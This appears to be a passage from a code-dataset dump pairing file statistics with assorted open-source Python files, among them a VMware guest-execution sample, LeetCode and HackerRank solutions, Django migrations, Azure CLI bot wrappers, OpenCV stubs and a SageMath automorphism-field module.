| 30.441176 | 81 | 0.646377 | 129 | 1,035 | 5.085271 | 0.550388 | 0.030488 | 0.036585 | 0.036585 | 0.018293 | 0.018293 | 0 | 0 | 0 | 0 | 0 | 0.020915 | 0.26087 | 1,035 | 33 | 82 | 31.363636 | 0.831373 | 0.336232 | 0 | 0 | 0 | 0 | 0.028065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.3125 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e07876c180b1fe862739bbb794ebb4912ec88dc2 | 296 | py | Python | HackerRank Solutions/Tutorials/30 Days of Code/Day 25 Running Time and Complexity.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 13 | 2021-09-02T07:30:02.000Z | 2022-03-22T19:32:03.000Z | HackerRank Solutions/Tutorials/30 Days of Code/Day 25 Running Time and Complexity.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | null | null | null | HackerRank Solutions/Tutorials/30 Days of Code/Day 25 Running Time and Complexity.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 3 | 2021-08-24T16:06:22.000Z | 2021-09-17T15:39:53.000Z | import math
for test in range(int(raw_input().strip())):
N = int(raw_input().strip())
flag = True
for i in range(2, int(math.sqrt(N))+1):
if N % i == 0:
flag = False
break
if flag and N > 1:
print 'Prime'
else:
print 'Not prime' | 24.666667 | 44 | 0.503378 | 45 | 296 | 3.266667 | 0.577778 | 0.095238 | 0.14966 | 0.217687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021053 | 0.358108 | 296 | 12 | 45 | 24.666667 | 0.752632 | 0 | 0 | 0 | 0 | 0 | 0.047138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0eb5a7ff168c71496426dc85f5b674665da4b63c | 3,619 | py | Python | samples/execute_program_in_vm.py | borland667/pyvmomi-community-samples | cd9b68de1c3e4494950b7c7b7872ca470ea4f2c1 | [
"Apache-2.0"
] | 6 | 2017-01-25T06:33:47.000Z | 2021-01-28T22:20:24.000Z | samples/execute_program_in_vm.py | borland667/pyvmomi-community-samples | cd9b68de1c3e4494950b7c7b7872ca470ea4f2c1 | [
"Apache-2.0"
] | null | null | null | samples/execute_program_in_vm.py | borland667/pyvmomi-community-samples | cd9b68de1c3e4494950b7c7b7872ca470ea4f2c1 | [
"Apache-2.0"
] | 4 | 2015-09-01T12:56:22.000Z | 2019-06-12T14:32:38.000Z | """
Written by Timo Sugliani
Github: https://github.com/tsugliani/
Code based on upload_file_to_vm snippet by Reubenur Rahman
Github: https://github.com/rreubenur/
This code is released under the terms of the Apache 2
http://www.apache.org/licenses/LICENSE-2.0.html
Example:
python execute_program_in_vm.py
-s <vcenter_fqdn>
-u <vcenter_username>
-p <vcenter_password>
-v <vm_uuid>
-r <vm_username>
-w <vm_password>
-l "/bin/cat"
-f "/etc/network/interfaces > /tmp/plop"
This should work on any debian/ubuntu type of vm, and will basically copy
the content of the network configuration to /tmp/plop
"""
from __future__ import with_statement
import atexit
from tools import cli
from pyVim import connect
from pyVmomi import vim, vmodl
def get_args():
"""Get command line args from the user.
"""
parser = cli.build_arg_parser()
parser.add_argument('-v', '--vm_uuid',
required=False,
action='store',
help='Virtual machine uuid')
parser.add_argument('-r', '--vm_user',
required=False,
action='store',
help='virtual machine user name')
parser.add_argument('-w', '--vm_pwd',
required=False,
action='store',
help='virtual machine password')
parser.add_argument('-l', '--path_to_program',
required=False,
action='store',
help='Path inside VM to the program')
parser.add_argument('-f', '--program_arguments',
required=False,
action='store',
help='Program command line options')
args = parser.parse_args()
cli.prompt_for_password(args)
return args
def main():
"""
Simple command-line program for executing a process in the VM without the
network requirement to actually access it.
"""
args = get_args()
try:
service_instance = connect.SmartConnect(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
atexit.register(connect.Disconnect, service_instance)
content = service_instance.RetrieveContent()
vm = content.searchIndex.FindByUuid(None, args.vm_uuid, True)
tools_status = vm.guest.toolsStatus
if (tools_status == 'toolsNotInstalled' or
tools_status == 'toolsNotRunning'):
raise SystemExit(
"VMwareTools is either not running or not installed. "
"Rerun the script after verifying that VMwareTools "
"is running")
creds = vim.vm.guest.NamePasswordAuthentication(
username=args.vm_user, password=args.vm_pwd
)
try:
pm = content.guestOperationsManager.processManager
ps = vim.vm.guest.ProcessManager.ProgramSpec(
programPath=args.path_to_program,
arguments=args.program_arguments
)
res = pm.StartProgramInGuest(vm, creds, ps)
if res > 0:
print "Program executed, PID is %d" % res
except IOError, e:
print e
except vmodl.MethodFault as error:
print "Caught vmodl fault : " + error.msg
return -1
return 0
# Start program
if __name__ == "__main__":
main()
| 29.422764 | 77 | 0.567007 | 392 | 3,619 | 5.094388 | 0.464286 | 0.022534 | 0.042564 | 0.06009 | 0.091137 | 0.063095 | 0.063095 | 0 | 0 | 0 | 0 | 0.002524 | 0.343189 | 3,619 | 122 | 78 | 29.663934 | 0.83761 | 0.003592 | 0 | 0.179104 | 0 | 0 | 0.152542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.074627 | 0.074627 | null | null | 0.044776 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0ec06191bce8f5203529096960255d2c9bb67918 | 2,429 | py | Python | .leetcode/637.average-of-levels-in-binary-tree.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/637.average-of-levels-in-binary-tree.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | .leetcode/637.average-of-levels-in-binary-tree.py | KuiyuanFu/PythonLeetCode | 8962df2fa838eb7ae48fa59de272ba55a89756d8 | [
"MIT"
] | null | null | null | # @lc app=leetcode id=637 lang=python3
#
# [637] Average of Levels in Binary Tree
#
# https://leetcode.com/problems/average-of-levels-in-binary-tree/description/
#
# algorithms
# Easy (67.09%)
# Likes: 2409
# Dislikes: 215
# Total Accepted: 223.8K
# Total Submissions: 332.7K
# Testcase Example: '[3,9,20,null,null,15,7]'
#
# Given the root of a binary tree, return the average value of the nodes on
# each level in the form of an array. Answers within 10^-5 of the actual answer
# will be accepted.
#
# Example 1:
#
#
# Input: root = [3,9,20,null,null,15,7]
# Output: [3.00000,14.50000,11.00000]
# Explanation: The average value of nodes on level 0 is 3, on level 1 is 14.5,
# and on level 2 is 11.
# Hence return [3, 14.5, 11].
#
#
# Example 2:
#
#
# Input: root = [3,9,20,15,7]
# Output: [3.00000,14.50000,11.00000]
#
#
#
# Constraints:
#
#
# The number of nodes in the tree is in the range [1, 10^4].
# -2^31 <= Node.val <= 2^31 - 1
#
#
#
# @lc tags=tree
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# 广度优先遍历二叉树。
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:
res = []
q = [root] if root else []
while q:
qn = []
s = 0
for p in q:
s += p.val
if p.left:
qn.append(p.left)
if p.right:
qn.append(p.right)
res.append(s / len(q))
q = qn
return res
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('root = [3,9,20,null,null,15,7]')
print('Exception :')
print('[3.00000,14.50000,11.00000]')
print('Output :')
print(
str(Solution().averageOfLevels(
listToTreeNode([3, 9, 20, None, None, 15, 7]))))
print()
print('Example 2:')
print('Input : ')
print('root = [3,9,20,15,7]')
print('Exception :')
print('[3.00000,14.50000,11.00000]')
print('Output :')
print(str(Solution().averageOfLevels(listToTreeNode([3, 9, 20, 15, 7]))))
print()
pass
# @lc main=end | 20.939655 | 79 | 0.5669 | 358 | 2,429 | 3.812849 | 0.346369 | 0.010256 | 0.020513 | 0.023443 | 0.312821 | 0.305495 | 0.254212 | 0.215385 | 0.191941 | 0.149451 | 0 | 0.107466 | 0.272128 | 2,429 | 116 | 80 | 20.939655 | 0.664593 | 0.496089 | 0 | 0.315789 | 0 | 0 | 0.160345 | 0.066379 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0.052632 | 0.026316 | 0 | 0.105263 | 0.421053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 2 |
0ec434bee10052b5691104148d7fe1aa2ca82dd1 | 412 | py | Python | mayan/apps/documents/signals.py | eshbeata/open-paperless | 6b9ed1f21908116ad2795b3785b2dbd66713d66e | [
"Apache-2.0"
] | 2,743 | 2017-12-18T07:12:30.000Z | 2022-03-27T17:21:25.000Z | mayan/apps/documents/signals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | 15 | 2017-12-18T14:58:07.000Z | 2021-03-01T20:05:05.000Z | mayan/apps/documents/signals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | 257 | 2017-12-18T03:12:58.000Z | 2022-03-25T08:59:10.000Z | from __future__ import unicode_literals
from django.dispatch import Signal
post_version_upload = Signal(providing_args=('instance',), use_caching=True)
post_document_type_change = Signal(
providing_args=('instance',), use_caching=True
)
post_document_created = Signal(providing_args=('instance',), use_caching=True)
post_initial_document_type = Signal(
providing_args=('instance',), use_caching=True
)
| 31.692308 | 78 | 0.798544 | 52 | 412 | 5.884615 | 0.423077 | 0.196078 | 0.248366 | 0.352941 | 0.627451 | 0.627451 | 0.627451 | 0.493464 | 0.346405 | 0 | 0 | 0 | 0.092233 | 412 | 12 | 79 | 34.333333 | 0.818182 | 0 | 0 | 0.2 | 0 | 0 | 0.07767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0ec9bd65ff3f2cf98dd76f46221f4d276cf0797f | 750 | py | Python | ecommerce/store/migrations/0024_auto_20210130_1413.py | Vishwas-bit/Ecommerce-Recommender-System | edf1ab1a6116720b7fb2038de18b494cdc7f08fb | [
"BSD-3-Clause"
] | null | null | null | ecommerce/store/migrations/0024_auto_20210130_1413.py | Vishwas-bit/Ecommerce-Recommender-System | edf1ab1a6116720b7fb2038de18b494cdc7f08fb | [
"BSD-3-Clause"
] | null | null | null | ecommerce/store/migrations/0024_auto_20210130_1413.py | Vishwas-bit/Ecommerce-Recommender-System | edf1ab1a6116720b7fb2038de18b494cdc7f08fb | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 3.1.3 on 2021-01-30 08:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0023_customuser_username'),
]
operations = [
migrations.AlterField(
model_name='cartdetail',
name='quantity',
field=models.PositiveBigIntegerField(default=1),
),
migrations.AlterField(
model_name='customuser',
name='username',
field=models.CharField(default='new user', max_length=30),
),
migrations.AlterField(
model_name='orderdetail',
name='quantity',
field=models.PositiveBigIntegerField(default=1),
),
]
| 25.862069 | 70 | 0.585333 | 68 | 750 | 6.367647 | 0.558824 | 0.138568 | 0.17321 | 0.200924 | 0.249423 | 0.249423 | 0.249423 | 0 | 0 | 0 | 0 | 0.043977 | 0.302667 | 750 | 28 | 71 | 26.785714 | 0.783939 | 0.06 | 0 | 0.454545 | 1 | 0 | 0.130868 | 0.034139 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0ecced261e8282b5b8a08a9ec41feae5d62e351b | 253 | py | Python | test/test_version.py | iosonofabio/anndata_utils | 0f762ae3ff01ba43774bd0f7390b6643606a1d0b | [
"MIT"
] | null | null | null | test/test_version.py | iosonofabio/anndata_utils | 0f762ae3ff01ba43774bd0f7390b6643606a1d0b | [
"MIT"
] | null | null | null | test/test_version.py | iosonofabio/anndata_utils | 0f762ae3ff01ba43774bd0f7390b6643606a1d0b | [
"MIT"
] | null | null | null | # vim: fdm=indent
# author: Fabio Zanini
# date: 17/06/20
# content: Test the package on same artificial data
import numpy as np
import pandas as pd
import anndata
import anndata_utils
def test_version():
print(anndata_utils.version)
| 19.461538 | 54 | 0.72332 | 38 | 253 | 4.736842 | 0.763158 | 0.144444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03 | 0.209486 | 253 | 12 | 55 | 21.083333 | 0.87 | 0.450593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.666667 | 0 | 0.833333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0ed8f069495933f8710dde54a02de79cbc5a71e1 | 1,946 | py | Python | pyaz/bot/telegram/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/bot/telegram/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/bot/telegram/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | '''
Manage the Telegram Channel on a bot.
'''
from ... pyaz_utils import _call_az
def create(access_token, name, resource_group, add_disabled=None, is_validated=None):
'''
Create the Telegram Channel on a bot.
Required Parameters:
- access_token -- The access token for the Telegram account.
- name -- The resource name of the bot. Bot name must be between 4 and 42 characters in length. Bot name can only have the following characters -, a - z, A - Z, 0 - 9, and _.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- add_disabled -- Add the channel in a disabled state.
- is_validated -- Whether or not the Telegram account has been validated for use with the bot.
'''
return _call_az("az bot telegram create", locals())
def show(name, resource_group, with_secrets=None):
'''
Get details of the Telegram Channel on a bot
Required Parameters:
- name -- The resource name of the bot. Bot name must be between 4 and 42 characters in length. Bot name can only have the following characters -, a - z, A - Z, 0 - 9, and _.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- with_secrets -- Show secrets in response for the channel.
'''
return _call_az("az bot telegram show", locals())
def delete(name, resource_group):
'''
Delete the Telegram Channel on a bot
Required Parameters:
- name -- The resource name of the bot. Bot name must be between 4 and 42 characters in length. Bot name can only have the following characters -, a - z, A - Z, 0 - 9, and _.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az bot telegram delete", locals())
| 42.304348 | 178 | 0.697328 | 292 | 1,946 | 4.558219 | 0.232877 | 0.087904 | 0.054095 | 0.060105 | 0.680691 | 0.680691 | 0.606311 | 0.606311 | 0.574756 | 0.574756 | 0 | 0.009855 | 0.217883 | 1,946 | 45 | 179 | 43.244444 | 0.864652 | 0.738952 | 0 | 0 | 0 | 0 | 0.162437 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0edf2a687d194cd512364dff648e31f86b56334d | 2,043 | py | Python | RRtoolbox/cv2_mock/xphoto.py | davtoh/RRTools | 6dde2d4622719d9031bf21ffbf7723231a0e2003 | [
"BSD-3-Clause"
] | 1 | 2019-07-16T03:54:22.000Z | 2019-07-16T03:54:22.000Z | RRtoolbox/cv2_mock/xphoto.py | davtoh/RRTools | 6dde2d4622719d9031bf21ffbf7723231a0e2003 | [
"BSD-3-Clause"
] | null | null | null | RRtoolbox/cv2_mock/xphoto.py | davtoh/RRTools | 6dde2d4622719d9031bf21ffbf7723231a0e2003 | [
"BSD-3-Clause"
] | 1 | 2019-07-09T02:49:06.000Z | 2019-07-09T02:49:06.000Z | # encoding: utf-8
# module cv2.xphoto
# from /home/davtoh/anaconda3/envs/rrtools/lib/python3.5/site-packages/cv2.cpython-35m-x86_64-linux-gnu.so
# by generator 1.144
# no doc
# no imports
# Variables with simple values
BM3D_STEP1 = 1
BM3D_STEP2 = 2
BM3D_STEPALL = 0
HAAR = 0
INPAINT_SHIFTMAP = 0
__loader__ = None
__spec__ = None
# functions
# real signature unknown; restored from __doc__
def applyChannelGains(src, gainB, gainG, gainR, dst=None):
""" applyChannelGains(src, gainB, gainG, gainR[, dst]) -> dst """
pass
def bm3dDenoising(src, dstStep1, dstStep2=None, h=None, templateWindowSize=None, searchWindowSize=None, blockMatchingStep1=None, blockMatchingStep2=None, groupSize=None, slidingStep=None, beta=None, normType=None, step=None, transformType=None): # real signature unknown; restored from __doc__
""" bm3dDenoising(src, dstStep1[, dstStep2[, h[, templateWindowSize[, searchWindowSize[, blockMatchingStep1[, blockMatchingStep2[, groupSize[, slidingStep[, beta[, normType[, step[, transformType]]]]]]]]]]]]) -> dstStep1, dstStep2 or bm3dDenoising(src[, dst[, h[, templateWindowSize[, searchWindowSize[, blockMatchingStep1[, blockMatchingStep2[, groupSize[, slidingStep[, beta[, normType[, step[, transformType]]]]]]]]]]]]) -> dst """
pass
def createGrayworldWB(): # real signature unknown; restored from __doc__
""" createGrayworldWB() -> retval """
pass
# real signature unknown; restored from __doc__
def createLearningBasedWB(path_to_model=None):
""" createLearningBasedWB([, path_to_model]) -> retval """
pass
def createSimpleWB(): # real signature unknown; restored from __doc__
""" createSimpleWB() -> retval """
pass
# real signature unknown; restored from __doc__
def dctDenoising(src, dst, sigma, psize=None):
""" dctDenoising(src, dst, sigma[, psize]) -> None """
pass
def inpaint(src, mask, dst, algorithmType): # real signature unknown; restored from __doc__
""" inpaint(src, mask, dst, algorithmType) -> None """
pass
# no classes
| 32.428571 | 440 | 0.717083 | 227 | 2,043 | 6.255507 | 0.387665 | 0.064085 | 0.098592 | 0.138028 | 0.502817 | 0.460563 | 0.26338 | 0.23662 | 0.23662 | 0.169014 | 0 | 0.023563 | 0.148311 | 2,043 | 62 | 441 | 32.951613 | 0.792529 | 0.608908 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0ee55d75c8c7f53f553453b8139166abece5d9e8 | 55,535 | py | Python | src/sage/manifolds/differentiable/automorphismfield.py | mkoeppe/sage | 316c5f6185bce3e8ea6e5159c7bd8b731af52372 | [
"BSL-1.0"
] | 1 | 2020-08-30T04:27:27.000Z | 2020-08-30T04:27:27.000Z | src/sage/manifolds/differentiable/automorphismfield.py | sbt4104/sage | 2cbd93e0b78dec701f4b7ad9271d3b1e967bcd6c | [
"BSL-1.0"
] | null | null | null | src/sage/manifolds/differentiable/automorphismfield.py | sbt4104/sage | 2cbd93e0b78dec701f4b7ad9271d3b1e967bcd6c | [
"BSL-1.0"
] | 1 | 2020-07-23T10:40:14.000Z | 2020-07-23T10:40:14.000Z | r"""
Tangent-Space Automorphism Fields
The class :class:`AutomorphismField` implements fields of automorphisms of
tangent spaces to a generic (a priori not parallelizable) differentiable
manifold, while the class :class:`AutomorphismFieldParal`
is devoted to fields of automorphisms of tangent spaces to a parallelizable
manifold. The latter play the important role of transitions between vector
frames sharing the same domain on a differentiable manifold.
AUTHORS:
- Eric Gourgoulhon (2015): initial version
- Travis Scrimshaw (2016): review tweaks
"""
# *****************************************************************************
# Copyright (C) 2015 Eric Gourgoulhon <eric.gourgoulhon@obspm.fr>
# Copyright (C) 2016 Travis Scrimshaw <tscrimsh@umn.edu>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# https://www.gnu.org/licenses/
# *****************************************************************************
from sage.tensor.modules.free_module_automorphism import FreeModuleAutomorphism
from sage.manifolds.differentiable.tensorfield import TensorField
from sage.manifolds.differentiable.tensorfield_paral import TensorFieldParal
class AutomorphismField(TensorField):
r"""
Field of automorphisms of tangent spaces to a generic (a priori
not parallelizable) differentiable manifold.
Given a differentiable manifold `U` and a differentiable map
`\Phi: U \rightarrow M` to a differentiable manifold `M`,
a *field of tangent-space automorphisms along* `U` *with values on*
`M \supset\Phi(U)` is a differentiable map
.. MATH::
a:\ U \longrightarrow T^{(1,1)} M,
with `T^{(1,1)} M` being the tensor bundle of type `(1,1)` over `M`,
such that
.. MATH::
\forall p \in U,\ a(p) \in \mathrm{Aut}(T_{\Phi(p)} M),
i.e. `a(p)` is an automorphism of the tangent space to `M` at the
point `\Phi(p)`.
The standard case of a field of tangent-space automorphisms *on* a
manifold corresponds to `U = M` and `\Phi = \mathrm{Id}_M`. Other
common cases are `\Phi` being an immersion and `\Phi` being a curve
in `M` (`U` is then an open interval of `\RR`).
.. NOTE::
If `M` is parallelizable, then :class:`AutomorphismFieldParal`
*must* be used instead.
INPUT:
- ``vector_field_module`` -- module `\mathfrak{X}(U,\Phi)` of vector
fields along `U` with values on `M` via the map `\Phi`
- ``name`` -- (default: ``None``) name given to the field
- ``latex_name`` -- (default: ``None``) LaTeX symbol to denote the field;
if none is provided, the LaTeX symbol is set to ``name``
- ``is_identity`` -- (default: ``False``) determines whether the
constructed object is a field of identity automorphisms
EXAMPLES:
Field of tangent-space automorphisms on a non-parallelizable
2-dimensional manifold::
sage: M = Manifold(2, 'M')
sage: U = M.open_subset('U') ; V = M.open_subset('V')
sage: M.declare_union(U,V) # M is the union of U and V
sage: c_xy.<x,y> = U.chart() ; c_uv.<u,v> = V.chart()
sage: transf = c_xy.transition_map(c_uv, (x+y, x-y), intersection_name='W',
....: restrictions1= x>0, restrictions2= u+v>0)
sage: inv = transf.inverse()
sage: a = M.automorphism_field(name='a') ; a
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
sage: a.parent()
General linear group of the Module X(M) of vector fields on the
2-dimensional differentiable manifold M
We first define the components of `a` with respect to the
coordinate frame on `U`::
sage: eU = c_xy.frame() ; eV = c_uv.frame()
sage: a[eU,:] = [[1,x], [0,2]]
It is equivalent to pass the components while defining `a`::
sage: a = M.automorphism_field({eU: [[1,x], [0,2]]}, name='a')
We then set the components with respect to the coordinate frame
on `V` by extending the expressions of the components in the
corresponding subframe on `W = U \cap V`::
sage: W = U.intersection(V)
sage: a.add_comp_by_continuation(eV, W, c_uv)
At this stage, the automorphism field `a` is fully defined::
sage: a.display(eU)
a = d/dx*dx + x d/dx*dy + 2 d/dy*dy
sage: a.display(eV)
a = (1/4*u + 1/4*v + 3/2) d/du*du + (-1/4*u - 1/4*v - 1/2) d/du*dv
+ (1/4*u + 1/4*v - 1/2) d/dv*du + (-1/4*u - 1/4*v + 3/2) d/dv*dv
In particular, we may ask for its inverse on the whole manifold `M`::
sage: ia = a.inverse() ; ia
Field of tangent-space automorphisms a^(-1) on the 2-dimensional
differentiable manifold M
sage: ia.display(eU)
a^(-1) = d/dx*dx - 1/2*x d/dx*dy + 1/2 d/dy*dy
sage: ia.display(eV)
a^(-1) = (-1/8*u - 1/8*v + 3/4) d/du*du + (1/8*u + 1/8*v + 1/4) d/du*dv
+ (-1/8*u - 1/8*v + 1/4) d/dv*du + (1/8*u + 1/8*v + 3/4) d/dv*dv
Equivalently, one can use the power minus one to get the inverse::
sage: ia is a^(-1)
True
or the operator ``~``::
sage: ia is ~a
True
"""
def __init__(self, vector_field_module, name=None, latex_name=None):
r"""
Construct a field of tangent-space automorphisms on a
non-parallelizable manifold.
TESTS:
Construction via ``parent.element_class``, and not via a direct call
to ``AutomorphismField``, to fit with the category framework::
sage: M = Manifold(2, 'M')
sage: U = M.open_subset('U') ; V = M.open_subset('V')
sage: M.declare_union(U,V) # M is the union of U and V
sage: c_xy.<x,y> = U.chart() ; c_uv.<u,v> = V.chart()
sage: transf = c_xy.transition_map(c_uv, (x+y, x-y), intersection_name='W',
....: restrictions1= x>0, restrictions2= u+v>0)
sage: inv = transf.inverse()
sage: XM = M.vector_field_module()
sage: GL = XM.general_linear_group()
sage: a = GL.element_class(XM, name='a'); a
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
sage: a[c_xy.frame(), :] = [[1+x^2, 0], [0, 1+y^2]]
sage: a.add_comp_by_continuation(c_uv.frame(), U.intersection(V), c_uv)
sage: TestSuite(a).run(skip='_test_pickling')
Construction of the identity field::
sage: b = GL.one(); b
Field of tangent-space identity maps on the 2-dimensional
differentiable manifold M
sage: TestSuite(b).run(skip='_test_pickling')
Construction with ``DifferentiableManifold.automorphism_field``::
sage: a1 = M.automorphism_field(name='a'); a1
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
sage: type(a1) == type(a)
True
.. TODO::
Fix ``_test_pickling`` (in the superclass :class:`TensorField`).
"""
TensorField.__init__(self, vector_field_module, (1,1), name=name,
latex_name=latex_name,
parent=vector_field_module.general_linear_group())
self._is_identity = False # a priori
self._init_derived() # initialization of derived quantities
def _repr_(self):
r"""
Return a string representation of ``self``.
TESTS::
sage: M = Manifold(2, 'M')
sage: a = M.automorphism_field(name='a')
sage: a._repr_()
'Field of tangent-space automorphisms a on the 2-dimensional differentiable manifold M'
sage: repr(a) # indirect doctest
'Field of tangent-space automorphisms a on the 2-dimensional differentiable manifold M'
sage: a # indirect doctest
Field of tangent-space automorphisms a on the 2-dimensional
differentiable manifold M
"""
description = "Field of tangent-space "
if self._is_identity:
description += "identity maps "
else:
description += "automorphisms "
if self._name is not None:
description += self._name + " "
return self._final_repr(description)
def _init_derived(self):
r"""
Initialize the derived quantities.
TESTS::
sage: M = Manifold(2, 'M')
sage: a = M.automorphism_field(name='a')
sage: a._init_derived()
"""
TensorField._init_derived(self)
self._inverse = None # inverse not set yet
def _del_derived(self):
r"""
Delete the derived quantities.
TESTS::
sage: M = Manifold(2, 'M')
sage: a = M.automorphism_field(name='a')
sage: a._del_derived()
"""
# First delete the derived quantities pertaining to the mother class:
TensorField._del_derived(self)
# then deletes the inverse automorphism:
self._inverse = None
def set_comp(self, basis=None):
r"""
Return the components of ``self`` w.r.t. a given module basis for
assignment.
The components with respect to other bases are deleted, in order to
avoid any inconsistency. To keep them, use the method :meth:`add_comp`
instead.
INPUT:
- ``basis`` -- (default: ``None``) basis in which the components are
defined; if none is provided, the components are assumed to refer to
the module's default basis
OUTPUT:
- components in the given basis, as an instance of the
class :class:`~sage.tensor.modules.comp.Components`; if such
components did not exist previously, they are created.
EXAMPLES::
sage: M = Manifold(2, 'M') # the 2-dimensional sphere S^2
sage: U = M.open_subset('U') # complement of the North pole
sage: c_xy.<x,y> = U.chart() # stereographic coordinates from the North pole
sage: V = M.open_subset('V') # complement of the South pole
sage: c_uv.<u,v> = V.chart() # stereographic coordinates from the South pole
sage: M.declare_union(U,V) # S^2 is the union of U and V
sage: e_uv = c_uv.frame()
sage: a= M.automorphism_field(name='a')
sage: a.set_comp(e_uv)
2-indices components w.r.t. Coordinate frame (V, (d/du,d/dv))
